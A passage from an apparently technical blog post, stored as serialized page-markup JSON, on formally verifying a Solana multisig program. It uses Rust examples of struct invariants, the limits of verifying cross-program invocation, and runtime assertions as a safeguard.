g":216,"props":31680,"children":31681},{"style":6953},[31682],{"type":31,"value":18779},{"type":25,"tag":216,"props":31684,"children":31685},{"style":7375},[31686],{"type":31,"value":31268},{"type":25,"tag":216,"props":31688,"children":31689},{"style":6964},[31690],{"type":31,"value":1850},{"type":25,"tag":216,"props":31692,"children":31693},{"style":6947},[31694],{"type":31,"value":31277},{"type":25,"tag":216,"props":31696,"children":31697},{"style":6964},[31698],{"type":31,"value":10688},{"type":25,"tag":216,"props":31700,"children":31701},{"class":6922,"line":7005},[31702,31707,31712,31717],{"type":25,"tag":216,"props":31703,"children":31704},{"style":6947},[31705],{"type":31,"value":31706},"        _",{"type":25,"tag":216,"props":31708,"children":31709},{"style":6953},[31710],{"type":31,"value":31711}," =>",{"type":25,"tag":216,"props":31713,"children":31714},{"style":7375},[31715],{"type":31,"value":31716}," None",{"type":25,"tag":216,"props":31718,"children":31719},{"style":6964},[31720],{"type":31,"value":7465},{"type":25,"tag":216,"props":31722,"children":31723},{"class":6922,"line":7110},[31724],{"type":25,"tag":216,"props":31725,"children":31726},{"style":6964},[31727],{"type":31,"value":7311},{"type":25,"tag":216,"props":31729,"children":31730},{"class":6922,"line":7216},[31731],{"type":25,"tag":216,"props":31732,"children":31733},{"style":6964},[31734],{"type":31,"value":7874},{"type":25,"tag":38,"props":31736,"children":31737},{},[31738,31740,31745,31747,31752,31754,31759,31761,31766],{"type":31,"value":31739},"So interestingly, a ",{"type":25,"tag":82,"props":31741,"children":31743},{"className":31742},[],[31744],{"type":31,"value":24943},{"type":31,"value":31746}," vec of size 0 ",{"type":25,"tag":64,"props":31748,"children":31749},{},[31750],{"type":31,"value":31751},"is actually",{"type":31,"value":31753}," a sufficient condition to execute ",{"type":25,"tag":82,"props":31755,"children":31757},{"className":31756},[],[31758],{"type":31,"value":29424},{"type":31,"value":31760},". However would it ever actually happen? Well we know from before that when we create the multisig, the threshold must be less than or equal to the number of keys and also greater than zero. So in any ",{"type":25,"tag":64,"props":31762,"children":31763},{},[31764],{"type":31,"value":31765},"valid",{"type":31,"value":31767}," multisig, the number of keys should never be zero.",{"type":25,"tag":38,"props":31769,"children":31770},{},[31771,31773,31778],{"type":31,"value":31772},"We can represent this ",{"type":25,"tag":64,"props":31774,"children":31775},{},[31776],{"type":31,"value":31777},"validity",{"type":31,"value":31779}," with a struct invariant. In fact the invariant we defined earlier will be sufficient:",{"type":25,"tag":206,"props":31781,"children":31783},{"code":31782,"language":6914,"meta":7,"className":6915,"style":7},"#[invariant(\n    (self.threshold >= 1)\n    && (self.threshold as usize \u003C= self.keys.len())\n)]\npub struct Ms { ... }\n",[31784],{"type":25,"tag":82,"props":31785,"children":31786},{"__ignoreMap":7},[31787,31794,31817,31868,31875],{"type":25,"tag":216,"props":31788,"children":31789},{"class":6922,"line":6923},[31790],{"type":25,"tag":216,"props":31791,"children":31792},{"style":6964},[31793],{"type":31,"value":24738},{"type":25,"tag":216,"props":31795,"children":31796},{"class":6922,"line":6769},[31797,31801,31805,31809,31813],{"type":25,"tag":216,"props":31798,"children":31799},{"style":6964},[31800],{"type":31,"value":28687},{"type":25,"tag":216,"props":31802,"children":31803},{"style":6953},[31804],{"type":31,"value":179},{"type":25,"tag":216,"props":31806,"children":31807},{"style":6964},[31808],{"type":31,"value":25031},{"type":25,"tag":216,"props":31810,"children":31811},{"style":6953},[31812],{"type":31,"value":13900},{"type":25,"tag":216,"props":31814,"children":31815},{"style":6964},[31816],{"type":31,"value":25040},{"type":25,"tag":216,"props":31818,"children":31819},{"class":6922,"line":6778},[31820,31824,31828,31832,31836,31840,31844,31848,31852,31856,31860,31864],{"type":25,"tag":216,"props":31821,"children":31822},{"style":6953},[31823],{"type":31,"value":19579},{"type":25,"tag":216,"props":31825,"children":31826},{"style":6964},[31827],{"type":31,"value":24964},{"type":25,"tag":216,"props":31829,"children":31830},{"style":6953},[31831],{"type":31,"value":179},{"type":25,"tag":216,"props":31833,"children":31834},{"style":6964},[31835],{"type":31,"value":25031},{"type":25,"tag":216,"props":31837,"children":31838},{"style":6936},[31839],{"type":31,"value":12795},{"type":25,"tag":216,"props":31841,"children":31842},{"style":7375},[31843],{"type":31,"value":17688},{"type":25,"tag":216,"props":31845,"children":31846},{"style":6953},[31847],{"type":31,"value":12149},{"type":25,"tag":216,"props":31849,"children":31850},{"style":6964},[31851],{"type":31,"value":17754},{"type":25,"tag":216,"props":31853,"children":31854},{"style":6953},[31855],{"type":31,"value":179},{"type":25,"tag":216,"props":31857,"children":31858},{"style":6964},[31859],{"type":31,"value":24943},{"type":25,"tag":216,"props":31861,"children":31862},{"style":6953},[31863],{"type":31,"value":179},{"type":25,"tag":216,"props":31865,"children":31866},{"style":6964},[31867],{"type":31,"value":25092},{"type":25,"tag":216,"props":31869,"children":31870},{"class":6922,"line":7005},[31871],{"type":25,"tag":216,"props":31872,"children":31873},{"style":6964},[31874],{"type":31,"value":24218},{"type":25,"tag":216,"props":31876,"children":31877},{"class":6922,"line":7110},[31878,31882,31886,31890,31894,31898],{"type":25,"tag":216,"props":31879,"children":31880},{"style":6936},[31881],{"type":31,"value":17647},{"type":25,"tag":216,"props":31883,"children":31884},{"style":6936},[31885],{"type":31,"value":25111},{"type":25,"tag":216,"props":31887,"children":31888},{"style":7375},[31889],{"type":31,"value":25116},{"type":25,"tag":216,"props":31891,"children":31892},{"style":6964},[31893],{"type":31,"value":13542},{"type":25,"tag":216,"props":31895,"children":31896},{"style":6953},[31897],{"type":31,"value":13547},{"type":25,"tag":216,"props":31899,"children":31900},{"style":6964},[31901],{"type":31,"value":13552},{"type":25,"tag":38,"props":31903,"children":31904},{},[31905,31907,31913,31915,31921],{"type":31,"value":31906},"The use of a struct invariant allows us to define (and verify) the possible states that an account can be in at the start and end of an instruction. In this case, our struct invariant rules out the case where ",{"type":25,"tag":82,"props":31908,"children":31910},{"className":31909},[],[31911],{"type":31,"value":31912},"keys.len() == 0",{"type":31,"value":31914}," and allows us to prove the biconditional ",{"type":25,"tag":82,"props":31916,"children":31918},{"className":31917},[],[31919],{"type":31,"value":31920},"(keys.len() >= 1) -> (instruction succeeds)",{"type":31,"value":179},{"type":25,"tag":606,"props":31923,"children":31925},{"id":31924},"safety-guarantees",[31926],{"type":31,"value":26730},{"type":25,"tag":38,"props":31928,"children":31929},{},[31930],{"type":31,"value":31931},"Formal verification is an awesome technique but it is not perfect. There are situations where things are not possible to formally verify and you need to resort to other methods.",{"type":25,"tag":38,"props":31933,"children":31934},{},[31935],{"type":31,"value":31936},"In particular, one of the difficult-to-verify parts of the Squads Multisig program is cross-program-invocation. Specifically, since cross-program-invocation executes foreign code, it is difficult (if not impossible) to verify whether this will succeed or fail.",{"type":25,"tag":38,"props":31938,"children":31939},{},[31940,31942,31948],{"type":31,"value":31941},"In the multisig program this happens in the ",{"type":25,"tag":82,"props":31943,"children":31945},{"className":31944},[],[31946],{"type":31,"value":31947},"execute_transaction",{"type":31,"value":31949}," instruction.",{"type":25,"tag":38,"props":31951,"children":31952},{},[31953],{"type":25,"tag":64,"props":31954,"children":31955},{},[31956],{"type":31,"value":31957},"So what do you do?",{"type":25,"tag":38,"props":31959,"children":31960},{},[31961],{"type":31,"value":31962},"For example, in a worst-case scenario you could imagine a situation like the following:",{"type":25,"tag":206,"props":31964,"children":31966},{"code":31965,"language":6914,"meta":7,"className":6915,"style":7},"#[derive(Accounts)]\npub MyCtx {\n    #[account(mut)]\n    pub my_account: Account\u003C'info, Acc>\n}\n\n#[account]\n#[invariant(bad == false)]\nstruct Acc {\n    pub bad: bool\n}\n\nimpl Acc {\n    pub fn put_into_bad_state() {\n        self.bad = true;\n    }\n}\n\n// Instruction handler:\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n    invoke_signed(...); // Cross-program invocation\n\n    let invoke_res = ...; // fetch result of invocation\n    if invoke_res == 5 {\n        ctx.my_account.put_into_bad_state(); // corrupt our account\n    }\n    Ok(())\n}\n",[31967],{"type":25,"tag":82,"props":31968,"children":31969},{"__ignoreMap":7},[31970,31985,32001,32016,32057,32064,32071,32078,32095,32111,32132,32139,32146,32162,32182,32210,32217,32224,32231,32239,32292,32318,32325,32354,32378,32413,32420,32431],{"type":25,"tag":216,"props":31971,"children":31972},{"class":6922,"line":6923},[31973,31977,31981],{"type":25,"tag":216,"props":31974,"children":31975},{"style":6964},[31976],{"type":31,"value":26783},{"type":25,"tag":216,"props":31978,"children":31979},{"style":7375},[31980],{"type":31,"value":26788},{"type":25,"tag":216,"props":31982,"children":31983},{"style":6964},[31984],{"type":31,"value":24218},{"type":25,"tag":216,"props":31986,"children":31987},{"class":6922,"line":6769},[31988,31992,31997],{"type":25,"tag":216,"props":31989,"children":31990},{"style":6936},[31991],{"type":31,"value":17647},{"type":25,"tag":216,"props":31993,"children":31994},{"style":7375},[31995],{"type":31,"value":31996}," MyCtx",{"type":25,"tag":216,"props":31998,"children":31999},{"style":6964},[32000],{"type":31,"value":7241},{"type":25,"tag":216,"props":32002,"children":32003},{"class":6922,"line":6778},[32004,32008,32012],{"type":25,"tag":216,"props":32005,"children":32006},{"style":6964},[32007],{"type":31,"value":27075},{"type":25,"tag":216,"props":32009,"children":32010},{"style":6936},[32011],{"type":31,"value":7691},{"type":25,"tag":216,"props":32013,"children":32014},{"style":6964},[32015],{"type":31,"value":24218},{"type":25,"tag":216,"props":32017,"children":32018},{"class":6922,"line":7005},[32019,32023,32028,32032,32036,32040,32044,32048,32053],{"type":25,"tag":216,"props":32020,"children":32021},{"style":6936},[32022],{"type":31,"value":24803},{"type":25,"tag":216,"props":32024,"children":32025},{"style":6947},[32026],{"type":31,"value":32027}," my_account",{"type":25,"tag":216,"props":32029,"children":32030},{"style":6953},[32031],{"type":31,"value":1472},{"type":25,"tag":216,"props":32033,"children":32034},{"style":7375},[32035],{"type":31,"value":27040},{"type":25,"tag":216,"props":32037,"children":32038},{"style":6964},[32039],{"type":31,"value":26868},{"type":25,"tag":216,"props":32041,"children":32042},{"style":7375},[32043],{"type":31,"value":26873},{"type":25,"tag":216,"props":32045,"children":32046},{"style":6964},[32047],{"type":31,"value":7026},{"type":25,"tag":216,"props":32049,"children":32050},{"style":7375},[32051],{"type":31,"value":32052},"Acc",{"type":25,"tag":216,"props":32054,"children":32055},{"style":6964},[32056],{"type":31,"value":9943},{"type":25,"tag":216,"props":32058,"children":32059},{"class":6922,"line":7110},[32060],{"type":25,"tag":216,"props":32061,"children":32062},{"style":6964},[32063],{"type":31,"value":7874},{"type":25,"tag":216,"props":32065,"children":32066},{"class":6922,"line":7216},[32067],{"type":25,"tag":216,"props":32068,"children":32069},{"emptyLinePlaceholder":16},[32070],{"type":31,"value":7642},{"type":25,"tag":216,"props":32072,"children":32073},{"class":6922,"line":7244},[32074],{"type":25,"tag":216,"props":32075,"children":32076},{"style":6964},[32077],{"type":31,"value":24730},{"type":25,"tag":216,"props":32079,"children":32080},{"class":6922,"line":7257},[32081,32086,32090],{"type":25,"tag":216,"props":32082,"children":32083},{"style":6964},[32084],{"type":31,"value":32085},"#[invariant(bad ",{"type":25,"tag":216,"props":32087,"children":32088},{"style":6953},[32089],{"type":31,"value":12528},{"type":25,"tag":216,"props":32091,"children":32092},{"style":6964},[32093],{"type":31,"value":32094}," false)]\n",{"type":25,"tag":216,"props":32096,"children":32097},{"class":6922,"line":7275},[32098,32102,32107],{"type":25,"tag":216,"props":32099,"children":32100},{"style":6936},[32101],{"type":31,"value":13357},{"type":25,"tag":216,"props":32103,"children":32104},{"style":7375},[32105],{"type":31,"value":32106}," Acc",{"type":25,"tag":216,"props":32108,"children":32109},{"style":6964},[32110],{"type":31,"value":7241},{"type":25,"tag":216,"props":32112,"children":32113},{"class":6922,"line":7296},[32114,32118,32123,32127],{"type":25,"tag":216,"props":32115,"children":32116},{"style":6936},[32117],{"type":31,"value":24803},{"type":25,"tag":216,"props":32119,"children":32120},{"style":6947},[32121],{"type":31,"value":32122}," bad",{"type":25,"tag":216,"props":32124,"children":32125},{"style":6953},[32126],{"type":31,"value":1472},{"type":25,"tag":216,"props":32128,"children":32129},{"style":7375},[32130],{"type":31,"value":32131}," bool\n",{"type":25,"tag":216,"props":32133,"children":32134},{"class":6922,"line":7305},[32135],{"type":25,"tag":216,"props":32136,"children":32137},{"style":6964},[32138],{"type":31,"value":7874},{"type":25,"tag":216,"props":32140,"children":32141},{"class":6922,"line":7557},[32142],{"type":25,"tag":216,"props":32143,"children":32144},{"emptyLinePlaceholder":16},[32145],{"type":31,"value":7642},{"type":25,"tag":216,"props":32147,"children":32148},{"class":6922,"line":7574},[32149,32154,32158],{"type":25,"tag":216,"props":32150,"children":32151},{"style":6936},[32152],{"type":31,"value":32153},"impl",{"type":25,"tag":216,"props":32155,"children":32156},{"style":7375},[32157],{"type":31,"value":32106},{"type":25,"tag":216,"props":32159,"children":32160},{"style":6964},[32161],{"type":31,"value":7241},{"type":25,"tag":216,"props":32163,"children":32164},{"class":6922,"line":7591},[32165,32169,32173,32178],{"type":25,"tag":216,"props":32166,"children":32167},{"style":6936},[32168],{"type":31,"value":24803},{"type":25,"tag":216,"props":32170,"children":32171},{"style":6936},[32172],{"type":31,"value":17652},{"type":25,"tag":216,"props":32174,"children":32175},{"style":7047},[32176],{"type":31,"value":32177}," put_into_bad_state",{"type":25,"tag":216,"props":32179,"children":32180},{"style":6964},[32181],{"type":31,"value":19694},{"type":25,"tag":216,"props":32183,"children":32184},{"class":6922,"line":7604},[32185,32189,32193,32198,32202,32206],{"type":25,"tag":216,"props":32186,"children":32187},{"style":6936},[32188],{"type":31,"value":31318},{"type":25,"tag":216,"props":32190,"children":32191},{"style":6953},[32192],{"type":31,"value":179},{"type":25,"tag":216,"props":32194,"children":32195},{"style":6964},[32196],{"type":31,"value":32197},"bad ",{"type":25,"tag":216,"props":32199,"children":32200},{"style":6953},[32201],{"type":31,"value":266},{"type":25,"tag":216,"props":32203,"children":32204},{"style":6936},[32205],{"type":31,"value":16425},{"type":25,"tag":216,"props":32207,"children":32208},{"style":6964},[32209],{"type":31,"value":6967},{"type":25,"tag":216,"props":32211,"children":32212},{"class":6922,"line":7613},[32213],{"type":25,"tag":216,"props":32214,"children":32215},{"style":6964},[32216],{"type":31,"value":7311},{"type":25,"tag":216,"props":32218,"children":32219},{"class":6922,"line":7636},[32220],{"type":25,"tag":216,"props":32221,"children":32222},{"style":6964},[32223],{"type":31,"value":7874},{"type":25,"tag":216,"props":32225,"children":32226},{"class":6922,"line":7645},[32227],{"type":25,"tag":216,"props":32228,"children":32229},{"emptyLinePlaceholder":16},[32230],{"type":31,"value":7642},{"type":25,"tag":216,"props":32232,"children":32233},{"class":6922,"line":7654},[32234],{"type":25,"tag":216,"props":32235,"children":32236},{"style":6927},[32237],{"type":31,"value":32238},"// Instruction handler:\n",{"type":25,"tag":216,"props":32240,"children":32241},{"class":6922,"line":7722},[32242,32246,32251,32255,32259,32263,32267,32271,32276,32280,32284,32288],{"type":25,"tag":216,"props":32243,"children":32244},{"style":6936},[32245],{"type":31,"value":24226},{"type":25,"tag":216,"props":32247,"children":32248},{"style":7047},[32249],{"type":31,"value":32250}," hard_to_verify",{"type":25,"tag":216,"props":32252,"children":32253},{"style":6964},[32254],{"type":31,"value":1850},{"type":25,"tag":216,"props":32256,"children":32257},{"style":6947},[32258],{"type":31,"value":24240},{"type":25,"tag":216,"props":32260,"children":32261},{"style":6953},[32262],{"type":31,"value":1472},{"type":25,"tag":216,"props":32264,"children":32265},{"style":7375},[32266],{"type":31,"value":24249},{"type":25,"tag":216,"props":32268,"children":32269},{"style":6964},[32270],{"type":31,"value":9757},{"type":25,"tag":216,"props":32272,"children":32273},{"style":7375},[32274],{"type":31,"value":32275},"MyCtx",{"type":25,"tag":216,"props":32277,"children":32278},{"style":6964},[32279],{"type":31,"value":24406},{"type":25,"tag":216,"props":32281,"children":32282},{"style":6953},[32283],{"type":31,"value":17714},{"type":25,"tag":216,"props":32285,"children":32286},{"style":7375},[32287],{"type":31,"value":17719},{"type":25,"tag":216,"props":32289,"children":32290},{"style":6964},[32291],{"type":31,"value":24291},{"type":25,"tag":216,"props":32293,"children":32294},{"class":6922,"line":7730},[32295,32300,32304,32308,32313],{"type":25,"tag":216,"props":32296,"children":32297},{"style":7047},[32298],{"type":31,"value":32299},"    invoke_signed",{"type":25,"tag":216,"props":32301,"children":32302},{"style":6964},[32303],{"type":31,"value":1850},{"type":25,"tag":216,"props":32305,"children":32306},{"style":6953},[32307],{"type":31,"value":13547},{"type":25,"tag":216,"props":32309,"children":32310},{"style":6964},[32311],{"type":31,"value":32312},"); ",{"type":25,"tag":216,"props":32314,"children":32315},{"style":6927},[32316],{"type":31,"value":32317},"// Cross-program invocation\n",{"type":25,"tag":216,"props":32319,"children":32320},{"class":6922,"line":7760},[32321],{"type":25,"tag":216,"props":32322,"children":32323},{"emptyLinePlaceholder":16},[32324],{"type":31,"value":7642},{"type":25,"tag":216,"props":32326,"children":32327},{"class":6922,"line":7768},[32328,32332,32337,32341,32345,32349],{"type":25,"tag":216,"props":32329,"children":32330},{"style":6936},[32331],{"type":31,"value":6939},{"type":25,"tag":216,"props":32333,"children":32334},{"style":6947},[32335],{"type":31,"value":32336}," invoke_res",{"type":25,"tag":216,"props":32338,"children":32339},{"style":6953},[32340],{"type":31,"value":6956},{"type":25,"tag":216,"props":32342,"children":32343},{"style":6953},[32344],{"type":31,"value":29257},{"type":25,"tag":216,"props":32346,"children":32347},{"style":6964},[32348],{"type":31,"value":21184},{"type":25,"tag":216,"props":32350,"children":32351},{"style":6927},[32352],{"type":31,"value":32353},"// fetch result of invocation\n",{"type":25,"tag":216,"props":32355,"children":32356},{"class":6922,"line":7800},[32357,32361,32365,32369,32374],{"type":25,"tag":216,"props":32358,"children":32359},{"style":6973},[32360],{"type":31,"value":16235},{"type":25,"tag":216,"props":32362,"children":32363},{"style":6947},[32364],{"type":31,"value":32336},{"type":25,"tag":216,"props":32366,"children":32367},{"style":6953},[32368],{"type":31,"value":7232},{"type":25,"tag":216,"props":32370,"children":32371},{"style":6989},[32372],{"type":31,"value":32373}," 5",{"type":25,"tag":216,"props":32375,"children":32376},{"style":6964},[32377],{"type":31,"value":7241},{"type":25,"tag":216,"props":32379,"children":32380},{"class":6922,"line":7808},[32381,32385,32389,32394,32398,32403,32408],{"type":25,"tag":216,"props":32382,"children":32383},{"style":6947},[32384],{"type":31,"value":30144},{"type":25,"tag":216,"props":32386,"children":32387},{"style":6953},[32388],{"type":31,"value":179},{"type":25,"tag":216,"props":32390,"children":32391},{"style":6964},[32392],{"type":31,"value":32393},"my_account",{"type":25,"tag":216,"props":32395,"children":32396},{"style":6953},[32397],{"type":31,"value":179},{"type":25,"tag":216,"props":32399,"children":32400},{"style":7047},[32401],{"type":31,"value":32402},"put_into_bad_state",{"type":25,"tag":216,"props":32404,"children":32405},{"style":6964},[32406],{"type":31,"value":32407},"(); ",{"type":25,"tag":216,"props":32409,"children":32410},{"style":6927},[32411],{"type":31,"value":32412},"// corrupt our account\n",{"type":25,"tag":216,"props":32414,"children":32415},{"class":6922,"line":7868},[32416],{"type":25,"tag":216,"props":32417,"children":32418},{"style":6964},[32419],{"type":31,"value":7311},{"type":25,"tag":216,"props":32421,"children":32422},{"class":6922,"line":13001},[32423,32427],{"type":25,"tag":216,"props":32424,"children":32425},{"style":7375},[32426],{"type":31,"value":18290},{"type":25,"tag":216,"props":32428,"children":32429},{"style":6964},[32430],{"type":31,"value":18295},{"type":25,"tag":216,"props":32432,"children":32433},{"class":6922,"line":13019},[32434],{"type":25,"tag":216,"props":32435,"children":32436},{"style":6964},[32437],{"type":31,"value":7874},{"type":25,"tag":38,"props":32439,"children":32440},{},[32441,32443,32448],{"type":31,"value":32442},"The integrity of the verification framework relies on the fact that the account invariants for the accounts contained in the instruction (in this case ",{"type":25,"tag":82,"props":32444,"children":32446},{"className":32445},[],[32447],{"type":31,"value":32393},{"type":31,"value":32449},") will be maintained as long as the instruction succeeds.",{"type":25,"tag":38,"props":32451,"children":32452},{},[32453],{"type":31,"value":32454},"In this case, we can't really verify if the instruction succeeds or not (at least without knowing which program/instruction will be invoked).",{"type":25,"tag":38,"props":32456,"children":32457},{},[32458,32460,32465],{"type":31,"value":32459},"However, we can ",{"type":25,"tag":64,"props":32461,"children":32462},{},[32463],{"type":31,"value":32464},"augment",{"type":31,"value":32466}," our code with additional runtime constraints to ensure that the safety properties are preserved even if formal verification fails.",{"type":25,"tag":38,"props":32468,"children":32469},{},[32470],{"type":31,"value":32471},"In this case, we can add runtime assertions that ensure our runtime invariants hold. For example:",{"type":25,"tag":206,"props":32473,"children":32475},{"code":32474,"language":6914,"meta":7,"className":6915,"style":7},"...\nfn hard_to_verify(ctx: Context\u003CMyCtx>) -> Result\u003C()> {\n    invoke_signed(...); // Cross-program invocation\n\n    let invoke_res = ...; // fetch result of invocation\n    if invoke_res == 5 {\n        ctx.my_account.put_into_bad_state(); // corrupt our account\n    }\n\n    // Enforce invariants at runtime\n    assert(ctx.my_account.invariant());\n\n    Ok(())\n}\n",[32476],{"type":25,"tag":82,"props":32477,"children":32478},{"__ignoreMap":7},[32479,32487,32538,32561,32568,32595,32618,32649,32656,32663,32671,32706,32713,32724],{"type":25,"tag":216,"props":32480,"children":32481},{"class":6922,"line":6923},[32482],{"type":25,"tag":216,"props":32483,"children":32484},{"style":6953},[32485],{"type":31,"value":32486},"...\n",{"type":25,"tag":216,"props":32488,"children":32489},{"class":6922,"line":6769},[32490,32494,32498,32502,32506,32510,32514,32518,32522,32526,32530,32534],{"type":25,"tag":216,"props":32491,"children":32492},{"style":6936},[32493],{"type":31,"value":24226},{"type":25,"tag":216,"props":32495,"children":32496},{"style":7047},[32497],{"type":31,"value":32250},{"type":25,"tag":216,"props":32499,"children":32500},{"style":6964},[32501],{"type":31,"value":1850},{"type":25,"tag":216,"props":32503,"children":32504},{"style":6947},[32505],{"type":31,"value":24240},{"type":25,"tag":216,"props":32507,"children":32508},{"style":6953},[32509],{"type":31,"value":1472},{"type":25,"tag":216,"props":32511,"children":32512},{"style":7375},[32513],{"type":31,"value":24249},{"type":25,"tag":216,"props":32515,"children":32516},{"style":6964},[32517],{"type":31,"value":9757},{"type":25,"tag":216,"props":32519,"children":32520},{"style":7375},[32521],{"type":31,"value":32275},{"type":25,"tag":216,"props":32523,"children":32524},{"style":6964},[32525],{"type":31,"value":24406},{"type":25,"tag":216,"props":32527,"children":32528},{"style":6953},[32529],{"type":31,"value":17714},{"type":25,"tag":216,"props":32531,"children":32532},{"style":7375},[32533],{"type":31,"value":17719},{"type":25,"tag":216,"props":32535,"children":32536},{"style":6964},[32537],{"type":31,"value":24291},{"type":25,"tag":216,"props":32539,"children":32540},{"class":6922,"line":6778},[32541,32545,32549,32553,32557],{"type":25,"tag":216,"props":32542,"children":32543},{"style":7047},[32544],{"type":31,"value":32299},{"type":25,"tag":216,"props":32546,"children":32547},{"style":6964},[32548],{"type":31,"value":1850},{"type":25,"tag":216,"props":32550,"children":32551},{"style":6953},[32552],{"type":31,"value":13547},{"type":25,"tag":216,"props":32554,"children":32555},{"style":6964},[32556],{"type":31,"value":32312},{"type":25,"tag":216,"props":32558,"children":32559},{"style":6927},[32560],{"type":31,"value":32317},{"type":25,"tag":216,"props":32562,"children":32563},{"class":6922,"line":7005},[32564],{"type":25,"tag":216,"props":32565,"children":32566},{"emptyLinePlaceholder":16},[32567],{"type":31,"value":7642},{"type":25,"tag":216,"props":32569,"children":32570},{"class":6922,"line":7110},[32571,32575,32579,32583,32587,32591],{"type":25,"tag":216,"props":32572,"children":32573},{"style":6936},[32574],{"type":31,"value":6939},{"type":25,"tag":216,"props":32576,"children":32577},{"style":6947},[32578],{"type":31,"value":32336},{"type":25,"tag":216,"props":32580,"children":32581},{"style":6953},[32582],{"type":31,"value":6956},{"type":25,"tag":216,"props":32584,"children":32585},{"style":6953},[32586],{"type":31,"value":29257},{"type":25,"tag":216,"props":32588,"children":32589},{"style":6964},[32590],{"type":31,"value":21184},{"type":25,"tag":216,"props":32592,"children":32593},{"style":6927},[32594],{"type":31,"value":32353},{"type":25,"tag":216,"props":32596,"children":32597},{"class":6922,"line":7216},[32598,32602,32606,32610,32614],{"type":25,"tag":216,"props":32599,"children":32600},{"style":6973},[32601],{"type":31,"value":16235},{"type":25,"tag":216,"props":32603,"children":32604},{"style":6947},[32605],{"type":31,"value":32336},{"type":25,"tag":216,"props":32607,"children":32608},{"style":6953},[32609],{"type":31,"value":7232},{"type":25,"tag":216,"props":32611,"children":32612},{"style":6989},[32613],{"type":31,"value":32373},{"type":25,"tag":216,"props":32615,"children":32616},{"style":6964},[32617],{"type":31,"value":7241},{"type":25,"tag":216,"props":32619,"children":32620},{"class":6922,"line":7244},[32621,32625,32629,32633,32637,32641,32645],{"type":25,"tag":216,"props":32622,"children":32623},{"style":6947},[32624],{"type":31,"value":30144},{"type":25,"tag":216,"props":32626,"children":32627},{"style":6953},[32628],{"type":31,"value":179},{"type":25,"tag":216,"props":32630,"children":32631},{"style":6964},[32632],{"type":31,"value":32393},{"type":25,"tag":216,"props":32634,"children":32635},{"style":6953},[32636],{"type":31,"value":179},{"type":25,"tag":216,"props":32638,"children":32639},{"style":7047},[32640],{"type":31,"value":32402},{"type":25,"tag":216,"props":32642,"children":32643},{"style":6964},[32644],{"type":31,"value":32407},{"type":25,"tag":216,"props":32646,"children":32647},{"style":6927},[32648],{"type":31,"value":32412},{"type":25,"tag":216,"props":32650,"children":32651},{"class":6922,"line":7257},[32652],{"type":25,"tag":216,"props":32653,"children":32654},{"style":6964},[32655],{"type":31,"value":7311},{"type":25,"tag":216,"props":32657,"children":32658},{"class":6922,"line":7275},[32659],{"type":25,"tag":216,"props":32660,"children":32661},{"emptyLinePlaceholder":16},[32662],{"type":31,"value":7642},{"type":25,"tag":216,"props":32664,"children":32665},{"class":6922,"line":7296},[32666],{"type":25,"tag":216,"props":32667,"children":32668},{"style":6927},[32669],{"type":31,"value":32670},"    // Enforce invariants at runtime\n",{"type":25,"tag":216,"props":32672,"children":32673},{"class":6922,"line":7305},[32674,32678,32682,32686,32690,32694,32698,32702],{"type":25,"tag":216,"props":32675,"children":32676},{"style":7047},[32677],{"type":31,"value":23200},{"type":25,"tag":216,"props":32679,"children":32680},{"style":6964},[32681],{"type":31,"value":1850},{"type":25,"tag":216,"props":32683,"children":32684},{"style":6947},[32685],{"type":31,"value":24240},{"type":25,"tag":216,"props":32687,"children":32688},{"style":6953},[32689],{"type":31,"value":179},{"type":25,"tag":216,"props":32691,"children":32692},{"style":6964},[32693],{"type":31,"value":32393},{"type":25,"tag":216,"props":32695,"children":32696},{"style":6953},[32697],{"type":31,"value":179},{"type":25,"tag":216,"props":32699,"children":32700},{"style":7047},[32701],{"type":31,"value":25725},{"type":25,"tag":216,"props":32703,"children":32704},{"style":6964},[32705],{"type":31,"value":19382},{"type":25,"tag":216,"props":32707,"children":32708},{"class":6922,"line":7557},[32709],{"type":25,"tag":216,"props":32710,"children":32711},{"emptyLinePlaceholder":16},[32712],{"type":31,"value":7642},{"type":25,"tag":216,"props":32714,"children":32715},{"class":6922,"line":7574},[32716,32720],{"type":25,"tag":216,"props":32717,"children":32718},{"style":7375},[32719],{"type":31,"value":18290},{"type":25,"tag":216,"props":32721,"children":32722},{"style":6964},[32723],{"type":31,"value":18295},{"type":25,"tag":216,"props":32725,"children":32726},{"class":6922,"line":7591},[32727],{"type":25,"tag":216,"props":32728,"children":32729},{"style":6964},[32730],{"type":31,"value":7874},{"type":25,"tag":38,"props":32732,"children":32733},{},[32734,32736,32741,32743,32748,32750,32755],{"type":31,"value":32735},"Here, we explicitly ",{"type":25,"tag":82,"props":32737,"children":32739},{"className":32738},[],[32740],{"type":31,"value":23944},{"type":31,"value":32742}," that our invariants hold at ",{"type":25,"tag":64,"props":32744,"children":32745},{},[32746],{"type":31,"value":32747},"runtime",{"type":31,"value":32749}," which allows us to be assured that ",{"type":25,"tag":82,"props":32751,"children":32753},{"className":32752},[],[32754],{"type":31,"value":32393},{"type":31,"value":32756}," will not enter a bad state as a result of some unverifiable behavior.",{"type":25,"tag":38,"props":32758,"children":32759},{},[32760],{"type":31,"value":32761},"In general techniques like this can be used to tidy up the loose ends that formal verification may struggle with.",{"type":25,"tag":26,"props":32763,"children":32765},{"id":32764},"challenges-of-formal-verification-on-solana",[32766],{"type":31,"value":32767},"Challenges of formal verification on Solana",{"type":25,"tag":606,"props":32769,"children":32771},{"id":32770},"expensive-computation",[32772],{"type":31,"value":32773},"Expensive computation",{"type":25,"tag":38,"props":32775,"children":32776},{},[32777,32779,32784],{"type":31,"value":32778},"As we started exploring this project, we were hoping to see it work straight out of the box. Unfortunately, that was not the case. Harkening back to our friend ",{"type":25,"tag":64,"props":32780,"children":32781},{},[32782],{"type":31,"value":32783},"path explosion",{"type":31,"value":32785},", it is often the case that bounded model checking just grinds and grinds on the problem and is not able to produce a solution.",{"type":25,"tag":38,"props":32787,"children":32788},{},[32789,32791,32796],{"type":31,"value":32790},"In order to make this technique more widely applicable, we've been developing a runtime SDK layer that is more ",{"type":25,"tag":64,"props":32792,"children":32793},{},[32794],{"type":31,"value":32795},"formal verification friendly",{"type":31,"value":32797},". Specifically our tool will replace certain built-in SDK functions and structures with less expensive ones in the context of symbolic execution.",{"type":25,"tag":38,"props":32799,"children":32800},{},[32801,32803,32808,32810,32815],{"type":31,"value":32802},"For example, when verifying things like the uniqueness of a ",{"type":25,"tag":82,"props":32804,"children":32806},{"className":32805},[],[32807],{"type":31,"value":25358},{"type":31,"value":32809}," in a ",{"type":25,"tag":82,"props":32811,"children":32813},{"className":32812},[],[32814],{"type":31,"value":906},{"type":31,"value":32816},", the native program may generate 